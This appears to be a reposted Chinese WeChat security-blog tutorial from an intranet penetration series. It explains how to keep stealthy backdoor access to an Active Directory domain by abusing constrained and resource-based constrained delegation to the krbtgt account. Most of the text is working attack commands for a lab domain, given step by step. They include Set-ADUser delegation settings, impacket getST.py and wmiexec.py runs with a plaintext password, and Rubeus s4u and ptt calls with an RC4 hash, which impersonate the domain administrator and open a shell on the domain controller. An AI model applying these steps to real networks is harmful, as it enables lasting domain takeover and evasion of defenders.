本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!
欢迎各位添加微信号:qinchang_198231
加入安全+ 交流群 和大佬们一起交流安全技术
利用约束性委派打造隐蔽后门(权限维持)
我们控制的用户选择的是自己创建的 test 域用户。
· 域控:win2008 192.168.10.131
· 域:xie.com
· 攻击机:Kali
首先修改 kali 的/etc/hosts/文件,添加如下内容
192.168.10.131 win2008
192.168.10.131 xie.com
然后在域控上配置test用户到krbtgt用户的约束性委派。
在Kali上进行攻击
./getST.py -dc-ip 192.168.10.131 -spn krbtgt/XIE.COM -impersonate administrator xie.com/test:x123456./
export KRB5CCNAME=administrator.ccache
./wmiexec.py -no-pass -k administrator@win2008 -dc-ip 192.168.10.131
利用基于资源的约束委派打造隐蔽后门(权限维持)
· 域控:Win2012 192.168.10.24
· 域成员主机:Win7 192.168.10.130
· 普通域用户:xiehack
首先修改 kali 的/etc/hosts/文件,添加如下内容
192.168.10.24 win2012
192.168.10.24 xie.com
配置基于资源的约束委派
这里我们用刚刚新建的test用户作为服务A,配置用户 test 到 krbtgt 的基于资源的约束委派
Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount test
Get-ADUser krbtgt -Properties PrincipalsAllowedToDelegateToAccount
在Kali上使用impacket进行攻击
./getST.py -dc-ip 192.168.10.24 -spn krbtgt -impersonate administrator xie.com/test:x123456./
export KRB5CCNAME=administrator.ccache
./wmiexec.py -no-pass -k administrator@win2012 -dc-ip 192.168.10.24
在Win7上使用Rubeus进行攻击
现在我们在Win7上用普通域用户 xiehack 使用Rubeus进行基于资源的约束性委派攻击
这下面的rc4是刚刚新建的test用户的密码哈希,我们也可以使用aes256来进行认证。服务我们设置为 krbtgt
Rubeus.exe s4u /user:test /rc4:b98e75b5ff7a3d3ff05e07f211ebe7a8 /domain:xie.com /msdsspn:krbtgt /impersonateuser:administrator
导入票据,访问域控
Rubeus.exe ptt /ticket:票据
参考文章:https://www.anquanke.com/post/id/170535
内网渗透(十一) | 哈希传递攻击(Pass-the-Hash,PtH)
技术干货 | 工具:Social engineering tookit 钓鱼网站
技术干货 | 工具的使用:CobaltStrike上线Linux主机(CrossC2)
内网渗透(七) | 内网转发及隐蔽隧道:网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)
本文始发于微信公众号(安世加):内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论